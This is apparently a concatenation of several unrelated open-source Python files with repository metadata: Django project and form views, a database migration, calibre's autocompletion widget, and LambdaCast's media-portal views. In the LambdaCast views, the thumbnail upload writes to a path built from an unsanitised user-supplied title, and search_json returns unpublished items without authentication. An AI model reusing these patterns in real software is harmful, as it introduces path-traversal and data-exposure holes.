messages.error(request, _("You are not allowed to see this forms list"))
raise Http404()
def get_context_data(self, **kwargs):
context = super(ProjectEdit, self).get_context_data(**kwargs)
context['project'] = models.Project.objects.get(pk=self.kwargs['project'])
return context
def post(self, request, *args, **kwargs):
context = self.get_context_data()
name = self.request.POST.get('project_name')
if name.isspace() or name=='':
messages.error(request, _("Bad project name!"))
return HttpResponseRedirect(reverse('project-edit', kwargs={'project': self.kwargs['project'] } ))
p = models.Project.objects.get(pk=self.kwargs['project'])
p.title = name
p.slug = slugify(name)
p.save()
messages.success(request, _("Project successfully updated!"))
return HttpResponseRedirect(reverse('form-list', kwargs={'project': self.kwargs['project'] } ))
class FormDelete(VerifiedMixin, TemplateView):
template_name = 'store/form_delete.html'
def get(self, request, *args, **kwargs):
project = get_object_or_404(models.Project, pk=self.kwargs['project'])
if project.owner == request.user:
return super(FormDelete, self).get(request, *args, **kwargs)
else:
messages.error(request, _("You are not allowed to delete this form."))
raise Http404()
def get_context_data(self, **kwargs):
context = super(FormDelete, self).get_context_data(**kwargs)
context['project'] = models.Project.objects.get(pk=self.kwargs['project'])
context['form'] = models.Form.objects.get(pk=self.kwargs['form'])
return context
def post(self, request, *args, **kwargs):
context = self.get_context_data()
try:
models.Form.objects.get(pk=self.kwargs['form']).delete()
messages.success(request, _("Form successfully deleted!"))
except:
messages.error(request, _("Error occurred while deleting form!"))
return HttpResponseRedirect(reverse('form-list', kwargs={'project': self.kwargs['project'] } ))
class ProjectDelete(VerifiedMixin, TemplateView):
template_name = 'store/project_delete.html'
def get(self, request, *args, **kwargs):
project = get_object_or_404(models.Project, pk=self.kwargs['project'])
if project.owner == request.user:
return super(ProjectDelete, self).get(request, *args, **kwargs)
else:
messages.error(request, _("You are not allowed to delete this project."))
raise Http404()
def get_context_data(self, **kwargs):
context = super(ProjectDelete, self).get_context_data(**kwargs)
context['project'] = models.Project.objects.get(pk=self.kwargs['project'])
return context
def post(self, request, *args, **kwargs):
context = self.get_context_data()
try:
models.Project.objects.get(pk=self.kwargs['project']).delete()
messages.success(request, _("Project successfully deleted!"))
except:
messages.error(request, _("Error occurred while deleting project!"))
return HttpResponseRedirect(reverse('project-list'))
class FormShare(VerifiedMixin, CreateView):
model = models.Sharing
template_name = 'store/form_share.html'
form_class = FormShareForm
def get(self, request, *args, **kwargs):
form = get_object_or_404(models.Form, pk=self.kwargs['form'])
if form.project.owner == self.request.user:
return super(FormShare, self).get(request, *args, **kwargs)
else:
messages.error(request, _("You can't share this form."))
raise Http404()
def get_context_data(self, **kwargs):
context = super(FormShare, self).get_context_data(**kwargs)
context['project'] = models.Project.objects.get(pk=self.kwargs['project'])
context['form_id'] = models.Form.objects.get(pk=self.kwargs['form'])
return context
def form_valid(self, form):
form.instance.form = models.Form.objects.get(pk=self.kwargs['form'])
form.instance.owner = User.objects.get(pk=form.cleaned_data.get('user'))
return super(FormShare, self).form_valid(form)
def get_success_url(self):
messages.success(self.request, _("Form successfully shared!"))
return reverse_lazy('forminstance-list', args=[self.kwargs['project'], self.kwargs['form']])
def get_form_kwargs(self):
kwargs = super(FormShare, self).get_form_kwargs()
kwargs['user'] = self.request.user
return kwargs
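# --- Illustrative note (not part of the original repository) ---
# The reverse()/reverse_lazy() calls above rely on URL names such as
# 'project-list', 'form-list', 'forminstance-list', 'project-add',
# 'project-edit' and 'dashboard'. A minimal urls.py wiring a few of them to
# the class-based views in this module could look roughly like the sketch
# below; the regex patterns are assumptions, only the names, the view
# classes and the 'project'/'form' kwargs come from this file.
#
#     from django.conf.urls import url
#     from store import views
#
#     urlpatterns = [
#         url(r'^$', views.ProjectList.as_view(), name='project-list'),
#         url(r'^project/add/$', views.ProjectAdd.as_view(), name='project-add'),
#         url(r'^project/(?P<project>\d+)/$', views.FormList.as_view(), name='form-list'),
#         url(r'^project/(?P<project>\d+)/form/(?P<form>\d+)/$',
#             views.FormInstanceList.as_view(), name='forminstance-list'),
#         url(r'^dashboard/$', views.Dashboard.as_view(), name='dashboard'),
#     ]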
|
mit
| 6,421,516,021,437,837,000 | 44.031662 | 191 | 0.555516 | false |
adaptive-learning/flocs-web
|
practice/migrations/0011_programsnapshot.py
|
1
|
1056
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import flocsweb.mixins
import datetime
import uuid
class Migration(migrations.Migration):
dependencies = [
('practice', '0010_remove_tasksession_creation_timestamp'),
]
operations = [
migrations.CreateModel(
name='ProgramSnapshot',
fields=[
('program_snapshot_id', models.UUIDField(serialize=False, editable=False, primary_key=True, default=uuid.uuid4)),
('order', models.IntegerField()),
('time', models.DateTimeField(default=datetime.datetime.now)),
('program', models.TextField()),
('execution', models.BooleanField(default=False)),
('correct', models.NullBooleanField(default=None)),
('task_session_id', models.ForeignKey(related_name='snapshots', to='practice.TaskSession')),
],
bases=(models.Model, flocsweb.mixins.ImportExportMixin),
),
]
|
gpl-3.0
| -3,683,538,642,854,860,000 | 34.2 | 129 | 0.610795 | false |
sharad/calibre
|
src/calibre/gui2/complete2.py
|
1
|
18187
|
#!/usr/bin/env python
# vim:fileencoding=UTF-8:ts=4:sw=4:sta:et:sts=4:ai
from __future__ import (unicode_literals, division, absolute_import,
print_function)
__license__ = 'GPL v3'
__copyright__ = '2012, Kovid Goyal <[email protected]>'
__docformat__ = 'restructuredtext en'
import weakref
import sip
from PyQt5.Qt import (
QLineEdit, QAbstractListModel, Qt, pyqtSignal, QObject, QKeySequence,
QApplication, QListView, QPoint, QModelIndex, QFont, QFontInfo,
QStyleOptionComboBox, QStyle, QComboBox, QTimer)
from calibre.constants import isosx, get_osx_version
from calibre.utils.icu import sort_key, primary_startswith, primary_contains
from calibre.gui2.widgets import EnComboBox, LineEditECM
from calibre.utils.config import tweaks
def containsq(x, prefix):
return primary_contains(prefix, x)
class CompleteModel(QAbstractListModel): # {{{
def __init__(self, parent=None, sort_func=sort_key):
QAbstractListModel.__init__(self, parent)
self.sort_func = sort_func
self.all_items = self.current_items = ()
self.current_prefix = ''
def set_items(self, items):
items = [unicode(x.strip()) for x in items]
items = [x for x in items if x]
items = tuple(sorted(items, key=self.sort_func))
self.beginResetModel()
self.all_items = self.current_items = items
self.current_prefix = ''
self.endResetModel()
def set_completion_prefix(self, prefix):
old_prefix = self.current_prefix
self.current_prefix = prefix
if prefix == old_prefix:
return
if not prefix:
self.beginResetModel()
self.current_items = self.all_items
self.endResetModel()
return
subset = prefix.startswith(old_prefix)
universe = self.current_items if subset else self.all_items
func = primary_startswith if tweaks['completion_mode'] == 'prefix' else containsq
self.beginResetModel()
self.current_items = tuple(x for x in universe if func(x, prefix))
self.endResetModel()
def rowCount(self, *args):
return len(self.current_items)
def data(self, index, role):
if role == Qt.DisplayRole:
try:
return self.current_items[index.row()]
except IndexError:
pass
def index_for_prefix(self, prefix):
for i, item in enumerate(self.current_items):
if primary_startswith(item, prefix):
return self.index(i)
# }}}
class Completer(QListView): # {{{
item_selected = pyqtSignal(object)
relayout_needed = pyqtSignal()
def __init__(self, completer_widget, max_visible_items=7, sort_func=sort_key):
QListView.__init__(self)
self.disable_popup = False
self.completer_widget = weakref.ref(completer_widget)
self.setWindowFlags(Qt.Popup)
self.max_visible_items = max_visible_items
self.setEditTriggers(self.NoEditTriggers)
self.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
self.setSelectionBehavior(self.SelectRows)
self.setSelectionMode(self.SingleSelection)
self.setAlternatingRowColors(True)
self.setModel(CompleteModel(self, sort_func=sort_func))
self.setMouseTracking(True)
self.entered.connect(self.item_entered)
self.activated.connect(self.item_chosen)
self.pressed.connect(self.item_chosen)
self.installEventFilter(self)
def hide(self):
self.setCurrentIndex(QModelIndex())
QListView.hide(self)
def item_chosen(self, index):
if not self.isVisible():
return
self.hide()
text = self.model().data(index, Qt.DisplayRole)
self.item_selected.emit(unicode(text))
def set_items(self, items):
self.model().set_items(items)
if self.isVisible():
self.relayout_needed.emit()
def set_completion_prefix(self, prefix):
self.model().set_completion_prefix(prefix)
if self.isVisible():
self.relayout_needed.emit()
def item_entered(self, idx):
if self.visualRect(idx).top() < self.viewport().rect().bottom() - 5:
# Prevent any bottom item in the list that is only partially
# visible from triggering setCurrentIndex()
self.entered.disconnect()
try:
self.setCurrentIndex(idx)
finally:
self.entered.connect(self.item_entered)
def next_match(self, previous=False):
c = self.currentIndex()
if c.isValid():
r = c.row()
else:
r = self.model().rowCount() if previous else -1
r = r + (-1 if previous else 1)
index = self.model().index(r % self.model().rowCount())
self.setCurrentIndex(index)
def scroll_to(self, orig):
if orig:
index = self.model().index_for_prefix(orig)
if index is not None and index.isValid():
self.setCurrentIndex(index)
def popup(self, select_first=True):
if self.disable_popup:
return
p = self
m = p.model()
widget = self.completer_widget()
if widget is None:
return
screen = QApplication.desktop().availableGeometry(widget)
h = (p.sizeHintForRow(0) * min(self.max_visible_items, m.rowCount()) +
3) + 3
hsb = p.horizontalScrollBar()
if hsb and hsb.isVisible():
h += hsb.sizeHint().height()
rh = widget.height()
pos = widget.mapToGlobal(QPoint(0, widget.height() - 2))
w = min(widget.width(), screen.width())
if (pos.x() + w) > (screen.x() + screen.width()):
pos.setX(screen.x() + screen.width() - w)
if pos.x() < screen.x():
pos.setX(screen.x())
top = pos.y() - rh - screen.top() + 2
bottom = screen.bottom() - pos.y()
h = max(h, p.minimumHeight())
if h > bottom:
h = min(max(top, bottom), h)
if top > bottom:
pos.setY(pos.y() - h - rh + 2)
p.setGeometry(pos.x(), pos.y(), w, h)
if (tweaks['preselect_first_completion'] and select_first and not
self.currentIndex().isValid() and self.model().rowCount() > 0):
self.setCurrentIndex(self.model().index(0))
if not p.isVisible():
if isosx and get_osx_version() >= (10, 9, 0):
# On mavericks the popup menu seems to use a font smaller than
# the widgets font, see for example:
# https://bugs.launchpad.net/bugs/1243761
fp = QFontInfo(widget.font())
f = QFont()
f.setPixelSize(fp.pixelSize())
self.setFont(f)
p.show()
def debug_event(self, ev):
from calibre.gui2 import event_type_name
print ('Event:', event_type_name(ev))
if ev.type() in (ev.KeyPress, ev.ShortcutOverride, ev.KeyRelease):
print ('\tkey:', QKeySequence(ev.key()).toString())
def eventFilter(self, obj, e):
'Redirect key presses from the popup to the widget'
widget = self.completer_widget()
if widget is None or sip.isdeleted(widget):
return False
etype = e.type()
if obj is not self:
return QObject.eventFilter(self, obj, e)
# self.debug_event(e)
if etype == e.KeyPress:
key = e.key()
if key == Qt.Key_Escape:
self.hide()
e.accept()
return True
if key == Qt.Key_F4 and e.modifiers() & Qt.AltModifier:
self.hide()
e.accept()
return True
if key in (Qt.Key_Enter, Qt.Key_Return):
# We handle this explicitly because on OS X activated() is
# not emitted on pressing Enter.
idx = self.currentIndex()
if idx.isValid():
self.item_chosen(idx)
self.hide()
e.accept()
return True
if key == Qt.Key_Tab:
idx = self.currentIndex()
if idx.isValid():
self.item_chosen(idx)
self.hide()
elif self.model().rowCount() > 0:
self.next_match()
e.accept()
return True
if key in (Qt.Key_PageUp, Qt.Key_PageDown):
# Let the list view handle these keys
return False
if key in (Qt.Key_Up, Qt.Key_Down):
self.next_match(previous=key == Qt.Key_Up)
e.accept()
return True
# Send to widget
widget.eat_focus_out = False
widget.keyPressEvent(e)
widget.eat_focus_out = True
if not widget.hasFocus():
# Widget lost focus hide the popup
self.hide()
if e.isAccepted():
return True
elif isosx and etype == e.InputMethodQuery and e.queries() == (Qt.ImHints | Qt.ImEnabled) and self.isVisible():
# In Qt 5 the Esc key causes this event and the line edit does not
# handle it, which causes the parent dialog to be closed
# See https://bugreports.qt-project.org/browse/QTBUG-41806
e.accept()
return True
elif etype == e.MouseButtonPress and not self.rect().contains(self.mapFromGlobal(e.globalPos())):
# A click outside the popup, close it
if isinstance(widget, QComboBox):
# This workaround is needed to ensure clicking on the drop down
# arrow of the combobox closes the popup
opt = QStyleOptionComboBox()
widget.initStyleOption(opt)
sc = widget.style().hitTestComplexControl(QStyle.CC_ComboBox, opt, widget.mapFromGlobal(e.globalPos()), widget)
if sc == QStyle.SC_ComboBoxArrow:
QTimer.singleShot(0, self.hide)
e.accept()
return True
self.hide()
e.accept()
return True
elif etype in (e.InputMethod, e.ShortcutOverride):
QApplication.sendEvent(widget, e)
return False
# }}}
class LineEdit(QLineEdit, LineEditECM):
'''
A line edit that completes on multiple items separated by a
separator. Use the :meth:`update_items_cache` to set the list of
all possible completions. Separator can be controlled with the
:meth:`set_separator` and :meth:`set_space_before_sep` methods.
A call to self.set_separator(None) will allow this widget to be used
to complete non multiple fields as well.
'''
def __init__(self, parent=None, completer_widget=None, sort_func=sort_key):
QLineEdit.__init__(self, parent)
self.sep = ','
self.space_before_sep = False
self.add_separator = True
self.original_cursor_pos = None
completer_widget = (self if completer_widget is None else
completer_widget)
self.mcompleter = Completer(completer_widget, sort_func=sort_func)
self.mcompleter.item_selected.connect(self.completion_selected,
type=Qt.QueuedConnection)
self.mcompleter.relayout_needed.connect(self.relayout)
self.mcompleter.setFocusProxy(completer_widget)
self.textEdited.connect(self.text_edited)
self.no_popup = False
# Interface {{{
def update_items_cache(self, complete_items):
self.all_items = complete_items
def set_separator(self, sep):
self.sep = sep
def set_space_before_sep(self, space_before):
self.space_before_sep = space_before
def set_add_separator(self, what):
self.add_separator = bool(what)
@dynamic_property
def all_items(self):
def fget(self):
return self.mcompleter.model().all_items
def fset(self, items):
self.mcompleter.model().set_items(items)
return property(fget=fget, fset=fset)
@dynamic_property
def disable_popup(self):
def fget(self):
return self.mcompleter.disable_popup
def fset(self, val):
self.mcompleter.disable_popup = bool(val)
return property(fget=fget, fset=fset)
# }}}
def complete(self, show_all=False, select_first=True):
orig = None
if show_all:
orig = self.mcompleter.model().current_prefix
self.mcompleter.set_completion_prefix('')
if not self.mcompleter.model().current_items:
self.mcompleter.hide()
return
self.mcompleter.popup(select_first=select_first)
self.setFocus(Qt.OtherFocusReason)
self.mcompleter.scroll_to(orig)
def relayout(self):
self.mcompleter.popup()
self.setFocus(Qt.OtherFocusReason)
def text_edited(self, *args):
if self.no_popup:
return
self.update_completions()
select_first = len(self.mcompleter.model().current_prefix) > 0
if not select_first:
self.mcompleter.setCurrentIndex(QModelIndex())
self.complete(select_first=select_first)
def update_completions(self):
' Update the list of completions '
self.original_cursor_pos = cpos = self.cursorPosition()
text = unicode(self.text())
prefix = text[:cpos]
complete_prefix = prefix.lstrip()
if self.sep:
complete_prefix = prefix.split(self.sep)[-1].lstrip()
self.mcompleter.set_completion_prefix(complete_prefix)
def get_completed_text(self, text):
'Get completed text in before and after parts'
if self.sep is None:
return text, ''
else:
cursor_pos = self.original_cursor_pos
if cursor_pos is None:
cursor_pos = self.cursorPosition()
self.original_cursor_pos = None
# Split text
curtext = unicode(self.text())
before_text = curtext[:cursor_pos]
after_text = curtext[cursor_pos:].rstrip()
# Remove the completion prefix from the before text
before_text = self.sep.join(before_text.split(self.sep)[:-1]).rstrip()
if before_text:
# Add the separator to the end of before_text
if self.space_before_sep:
before_text += ' '
before_text += self.sep + ' '
if self.add_separator or after_text:
# Add separator to the end of completed text
if self.space_before_sep:
text = text.rstrip() + ' '
completed_text = text + self.sep + ' '
else:
completed_text = text
return before_text + completed_text, after_text
def completion_selected(self, text):
before_text, after_text = self.get_completed_text(unicode(text))
self.setText(before_text + after_text)
self.setCursorPosition(len(before_text))
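# Illustrative usage sketch (not part of the original module); it mirrors the
# EditWithComplete demo in __main__ below but drives LineEdit directly, and
# all candidate values are made up for the example.
#
#     le = LineEdit()
#     le.update_items_cache(['red', 'green', 'blue'])   # completion candidates
#     le.set_separator(',')             # complete each comma-separated item
#     le.set_space_before_sep(False)    # no space before the separator
#     le.set_add_separator(True)        # append ', ' after an accepted match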
class EditWithComplete(EnComboBox):
def __init__(self, *args, **kwargs):
EnComboBox.__init__(self, *args)
self.setLineEdit(LineEdit(self, completer_widget=self, sort_func=kwargs.get('sort_func', sort_key)))
self.setCompleter(None)
self.eat_focus_out = True
self.installEventFilter(self)
# Interface {{{
def showPopup(self):
orig = self.disable_popup
self.disable_popup = False
try:
self.lineEdit().complete(show_all=True)
finally:
self.disable_popup = orig
def update_items_cache(self, complete_items):
self.lineEdit().update_items_cache(complete_items)
def set_separator(self, sep):
self.lineEdit().set_separator(sep)
def set_space_before_sep(self, space_before):
self.lineEdit().set_space_before_sep(space_before)
def set_add_separator(self, what):
self.lineEdit().set_add_separator(what)
def show_initial_value(self, what):
what = unicode(what) if what else u''
self.setText(what)
self.lineEdit().selectAll()
@dynamic_property
def all_items(self):
def fget(self):
return self.lineEdit().all_items
def fset(self, val):
self.lineEdit().all_items = val
return property(fget=fget, fset=fset)
@dynamic_property
def disable_popup(self):
def fget(self):
return self.lineEdit().disable_popup
def fset(self, val):
self.lineEdit().disable_popup = bool(val)
return property(fget=fget, fset=fset)
# }}}
def text(self):
return unicode(self.lineEdit().text())
def selectAll(self):
self.lineEdit().selectAll()
def setText(self, val):
le = self.lineEdit()
le.no_popup = True
le.setText(val)
le.no_popup = False
def setCursorPosition(self, *args):
self.lineEdit().setCursorPosition(*args)
@property
def textChanged(self):
return self.lineEdit().textChanged
def clear(self):
self.lineEdit().clear()
EnComboBox.clear(self)
def eventFilter(self, obj, e):
try:
c = self.lineEdit().mcompleter
except AttributeError:
return False
etype = e.type()
if self.eat_focus_out and self is obj and etype == e.FocusOut:
if c.isVisible():
return True
return EnComboBox.eventFilter(self, obj, e)
if __name__ == '__main__':
from PyQt5.Qt import QDialog, QVBoxLayout
app = QApplication([])
d = QDialog()
d.setLayout(QVBoxLayout())
le = EditWithComplete(d)
d.layout().addWidget(le)
items = ['one', 'otwo', 'othree', 'ooone', 'ootwo',
'oothree', 'a1', 'a2',u'Edgas', u'Èdgar', u'Édgaq', u'Edgar', u'Édgar']
le.update_items_cache(items)
le.show_initial_value('')
d.exec_()
|
gpl-3.0
| -5,513,565,515,612,933,000 | 34.795276 | 127 | 0.580675 | false |
LambdaCast/LambdaCast
|
portal/views.py
|
1
|
16341
|
# -*- coding: utf-8 -*-
from django.shortcuts import get_object_or_404, redirect
from django.http import HttpResponse
from django.contrib.auth.decorators import login_required
from django.db.models import Q
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from django.core import serializers
from django.utils.translation import ugettext_lazy as _
from django.template.response import TemplateResponse
from portal.models import MediaItem, Comment, Channel, Collection, Submittal, MediaFile
from portal.forms import MediaItemForm, CommentForm, getThumbnails, ThumbnailForm, SubmittalForm
from portal.media_formats import MEDIA_FORMATS
from portal.templatetags.custom_filters import seconds_to_hms
from taggit.models import Tag
import lambdaproject.settings as settings
import djangotasks
import os
import re
from operator import attrgetter
import itertools
def index(request):
    ''' This view is the front page of OwnTube. It fetches the latest available media items and
    collections and forwards them to the template. We use Django's Paginator for pagination '''
if request.user.is_authenticated():
queryset = itertools.chain(MediaItem.objects.filter(encodingDone=True).order_by('-date','-modified'),Collection.objects.all().order_by('-created'))
else:
queryset = itertools.chain(MediaItem.objects.filter(encodingDone=True, published=True).order_by('-date','-modified'),Collection.objects.all().order_by('-created'))
queryset_sorted = sorted(queryset, key=attrgetter('date', 'created'), reverse=True)
paginator = Paginator(queryset_sorted,16)
channel_list = Channel.objects.all()
page = request.GET.get('page')
rss_list = []
for file_type in MEDIA_FORMATS:
rss_list.append((MEDIA_FORMATS[file_type].format_key,MEDIA_FORMATS[file_type].mediatype,"/feeds/latest/"+file_type))
rss_list.append(('torrent','torrent','/feeds/latest/torrent'))
try:
mediaitems = paginator.page(page)
except PageNotAnInteger:
# If page is not an integer, deliver first page.
mediaitems = paginator.page(1)
except EmptyPage:
# If page is out of range (e.g. 9999), deliver last page of results.
mediaitems = paginator.page(paginator.num_pages)
return TemplateResponse(request, 'portal/index.html', {'latest_mediaitems_list': mediaitems, 'channel_list': channel_list, 'rss_list': rss_list})
def channel_list(request,slug):
    ''' This is the view for a channel's item list; it works almost like the index view'''
channel = get_object_or_404(Channel, slug=slug)
if request.user.is_authenticated():
queryset = itertools.chain(MediaItem.objects.filter(encodingDone=True, channel__slug=slug).order_by('-date','-modified'),Collection.objects.filter(channel__slug=slug).order_by('-created'))
else:
queryset = itertools.chain(MediaItem.objects.filter(encodingDone=True, published=True, channel__slug=slug).order_by('-date','-modified'),Collection.objects.filter(channel__slug=slug).order_by('-created'))
queryset_sorted = sorted(queryset, key=attrgetter('date', 'created'), reverse=True)
paginator = Paginator(queryset_sorted,15)
channel_list = Channel.objects.all()
page = request.GET.get('page')
rss_list = []
for file_type in MEDIA_FORMATS:
rss_list.append((MEDIA_FORMATS[file_type].format_key,MEDIA_FORMATS[file_type].mediatype,"/feeds/"+channel.slug+"/"+file_type))
rss_list.append(('torrent','torrent','/feeds/'+channel.slug+'/torrent'))
try:
mediaitems = paginator.page(page)
except PageNotAnInteger:
# If page is not an integer, deliver first page.
mediaitems = paginator.page(1)
except EmptyPage:
# If page is out of range (e.g. 9999), deliver last page of results.
mediaitems = paginator.page(paginator.num_pages)
return TemplateResponse(request, 'portal/channel.html', {'mediaitems_list': mediaitems, 'channel': channel, 'channel_list': channel_list, 'rss_list': rss_list})
@login_required
def get_duration(request, slug):
mediaitem = get_object_or_404(MediaItem, slug=slug)
if mediaitem.get_and_save_duration():
duration_feedback = seconds_to_hms(mediaitem.duration)
else:
duration_feedback = "Error"
return HttpResponse(duration_feedback)
def detail(request, slug):
    ''' Handles the detail view of a media item (the player, so to speak) and handles the comments (this should become nicer with AJAX and stuff)'''
mediaitem = get_object_or_404(MediaItem, slug=slug)
if request.user.is_authenticated():
comment_list = Comment.objects.filter(item=mediaitem).order_by('-created')
else:
comment_list = Comment.objects.filter(item=mediaitem,moderated=True).order_by('-created')
if request.method == 'POST':
comment = Comment(item=mediaitem,ip=request.META["REMOTE_ADDR"])
form = CommentForm(request.POST, instance=comment)
if form.is_valid():
comment = form.save(commit=False)
comment.save()
message = _(u"Your comment will be moderated")
comment.send_notification_mail()
return TemplateResponse(request, 'portal/items/detail.html', {'comment_list': comment_list, 'mediaitem': mediaitem, 'comment_form': CommentForm(), 'message': message})
else:
return TemplateResponse(request, 'portal/items/detail.html', {'comment_list': comment_list, 'mediaitem': mediaitem, 'comment_form': form})
else:
form = CommentForm()
return TemplateResponse(request, 'portal/items/detail.html', {'mediaitem': mediaitem, 'comment_list': comment_list, 'comment_form': form})
def iframe(request, slug):
    ''' Returns an iframe for an item so that media items can be shared easily '''
mediaitem = get_object_or_404(MediaItem, slug=slug)
return TemplateResponse(request, 'portal/items/iframe.html', {'mediaitem': mediaitem})
def tag(request, tag):
''' Gets all media items for a specified tag'''
if request.user.is_authenticated():
mediaitemslist = MediaItem.objects.filter(encodingDone=True, tags__slug__in=[tag]).order_by('-date')
else:
mediaitemslist = MediaItem.objects.filter(encodingDone=True, published=True, tags__slug__in=[tag]).order_by('-date')
tag_name = get_object_or_404(Tag, slug=tag)
return TemplateResponse(request, 'portal/items/list.html', {'mediaitems_list': mediaitemslist, 'tag': tag_name})
def collection(request, slug):
    ''' Gets all media items for a collection'''
collection = get_object_or_404(Collection, slug=slug)
rss_list = []
for file_type in MEDIA_FORMATS:
rss_list.append((MEDIA_FORMATS[file_type].format_key,MEDIA_FORMATS[file_type].mediatype,"/feeds/collection/"+collection.slug+"/"+file_type))
if request.user.is_authenticated():
mediaitemslist = collection.items.filter(encodingDone=True)
else:
mediaitemslist = collection.items.filter(encodingDone=True, published=True)
return TemplateResponse(request, 'portal/collection.html', {'mediaitems_list': mediaitemslist, 'collection': collection, 'rss_list': rss_list })
def search(request):
''' The search view for handling the search using Django's "Q"-class (see normlize_query and _get_query)'''
query_string = ''
found_entries = None
if ('q' in request.GET) and request.GET['q'].strip():
query_string = request.GET['q']
entry_query = _get_query(query_string, ['title', 'description', 'tags__name'])
if request.user.is_authenticated():
found_entries = MediaItem.objects.filter(entry_query).order_by('-date')
else:
found_entries = MediaItem.objects.filter(entry_query, published=True).order_by('-date')
return TemplateResponse(request, 'portal/search_results.html', { 'query_string': query_string, 'mediaitems_list': found_entries})
def search_json(request):
    ''' The JSON search view, handling the search using Django's "Q"-class (see _normalize_query and _get_query)'''
query_string = ''
found_entries = None
if ('q' in request.GET) and request.GET['q'].strip():
query_string = request.GET['q']
entry_query = _get_query(query_string, ['title', 'description','tags__name'])
found_entries = MediaItem.objects.filter(entry_query).order_by('-date')
data = serializers.serialize('json', found_entries)
return HttpResponse(data, content_type = 'application/javascript; charset=utf8')
def tag_json(request, tag):
mediaitemslist = MediaItem.objects.filter(encodingDone=True, published=True, tags__name__in=[tag]).order_by('-date')
data = serializers.serialize('json', mediaitemslist)
return HttpResponse(data, content_type = 'application/javascript; charset=utf8')
@login_required
def submittal(request, subm_id):
submittal = get_object_or_404(Submittal, pk = subm_id)
if request.method == 'POST':
form = SubmittalForm(request.POST)
if form.is_valid():
mediaitem = form.save()
mediaitem.user = request.user
mediaitem.save()
form.create_mediafiles(mediaitem)
mediaitem.get_and_save_duration()
return redirect(index)
else:
return TemplateResponse(request, 'portal/submittal.html', {'submittal_form': form, 'submittal': submittal})
else:
form = SubmittalForm(initial={
'title': submittal.media_title,
'description': submittal.media_description,
'channel': submittal.media_channel,
'license': submittal.media_license,
'linkURL': submittal.media_linkURL,
'torrentURL': submittal.media_torrentURL,
'media_mp3URL': submittal.media_mp3URL,
'media_oggURL': submittal.media_oggURL,
'media_opusURL': submittal.media_opusURL,
'videoThumbURL': submittal.media_videoThumbURL,
'audioThumbURL': submittal.media_audioThumbURL,
'published': submittal.media_published,
'tags': ", ".join(str(x) for x in submittal.media_tags.all()),
'torrentDone': submittal.media_torrentDone,
'encodingDone': True,
})
return TemplateResponse(request, 'portal/submittal.html', {'submittal_form': form, 'submittal': submittal})
@login_required
def upload_thumbnail(request):
if request.method == 'POST':
form = ThumbnailForm(request.POST, request.FILES or None)
if form.is_valid():
if (request.FILES['file'].content_type == 'image/png' or request.FILES['file'].content_type == 'image/jpeg') and not form.data['title'] == '':
_handle_uploaded_thumbnail(request.FILES['file'], form.data['title'])
message = _("The upload of %s was successful") % (form.data['title'])
form = ThumbnailForm()
return TemplateResponse(request, 'portal/thumbnail.html', {'thumbnail_form': ThumbnailForm(), 'thumbs_list':_get_thumbnails_list, 'message': message})
else:
error = _("Please upload an image file")
return TemplateResponse(request, 'portal/thumbnail.html', {'thumbnail_form': form, 'thumbs_list':_get_thumbnails_list, 'error': error})
else:
return TemplateResponse(request, 'portal/thumbnail.html', {'thumbnail_form': form, 'thumbs_list':_get_thumbnails_list})
else:
return TemplateResponse(request, 'portal/thumbnail.html', {'thumbnail_form': ThumbnailForm(), 'thumbs_list':_get_thumbnails_list})
def _handle_uploaded_thumbnail(f, filename):
suffix = '.png' if (f.content_type == 'image/png') else '.jpg'
suffix = '' if (filename.endswith(suffix)) else suffix
destination = open(settings.THUMBNAILS_DIR + filename + suffix, 'wb+')
for chunk in f.chunks():
destination.write(chunk)
destination.close()
@login_required
def submit(request):
    ''' The view for uploading items. Only authenticated users can upload media items!
    We use django tasks to create a new task for encoding these items. If we use
    bittorrent to distribute our files we also use django tasks to create the .torrent
    files (this can take a few minutes for very large files) '''
if request.method == 'POST':
form = MediaItemForm(request.POST, request.FILES or None)
if form.is_valid():
media_item = form.save()
if form.cleaned_data['thumbURL']:
media_item.audioThumbURL = form.cleaned_data['thumbURL']
media_item.videoThumbURL = form.cleaned_data['thumbURL']
media_item.user = request.user
media_item.save()
media_item.get_and_save_duration()
outputdir = settings.ENCODING_OUTPUT_DIR + media_item.slug
if not os.path.exists(outputdir):
os.makedirs(outputdir)
cover_task = djangotasks.task_for_object(media_item.get_and_save_cover)
djangotasks.run_task(cover_task)
for target_format in form.cleaned_data['fileFormats']:
media_format = MEDIA_FORMATS[target_format]
url = settings.ENCODED_BASE_URL + media_item.slug + '/' + media_item.slug + media_format.extension
media_file = MediaFile.objects.create(title=media_item.title + " " + media_format.text,
url=url, file_format=media_format.format_key,
media_item=media_item, mediatype=media_format.mediatype)
encoding_task = djangotasks.task_for_object(media_file.encode_media)
djangotasks.run_task(encoding_task)
if settings.USE_BITTORRENT:
torrent_task = djangotasks.task_for_object(media_item.create_bittorrent)
djangotasks.run_task(torrent_task)
return redirect(index)
return TemplateResponse(request, 'portal/submit.html', {'submit_form': form})
else:
form = MediaItemForm()
return TemplateResponse(request, 'portal/submit.html', {'submit_form': form})
@login_required
def status(request):
tasks_mediaitem = djangotasks.models.Task.objects.filter(model="portal.mediaitem").exclude(status="successful")
tasks_mediafile = djangotasks.models.Task.objects.filter(model="portal.mediafile").exclude(status="successful")
mediaitem_ids = set(map((lambda mediaitem: mediaitem.object_id), tasks_mediaitem))
for mediafile in tasks_mediafile:
try:
mediaitem_ids.add(MediaFile.objects.get(pk=mediafile.object_id).media_item.pk)
except MediaFile.DoesNotExist:
pass
mediaitems = MediaItem.objects.filter(pk__in=mediaitem_ids)
return TemplateResponse(request, 'portal/status.html', {'mediaitems': mediaitems})
def _normalize_query(query_string,
findterms=re.compile(r'"([^"]+)"|(\S+)').findall,
normspace=re.compile(r'\s{2,}').sub):
    ''' Splits the query string into individual keywords, getting rid of unnecessary spaces
and grouping quoted words together.
Example:
>>> _normalize_query(' some random words "with quotes " and spaces')
['some', 'random', 'words', 'with quotes', 'and', 'spaces']
'''
return [normspace(' ', (t[0] or t[1]).strip()) for t in findterms(query_string)]
def _get_query(query_string, search_fields):
''' Returns a query, that is a combination of Q objects. That combination
aims to search keywords within a model by testing the given search fields.
'''
query = None # Query to search for every search term
terms = _normalize_query(query_string)
for term in terms:
or_query = None # Query to search for a given term in each field
for field_name in search_fields:
q = Q(**{"%s__icontains" % field_name: term})
if or_query is None:
or_query = q
else:
or_query = or_query | q
if query is None:
query = or_query
else:
query = query & or_query
return query
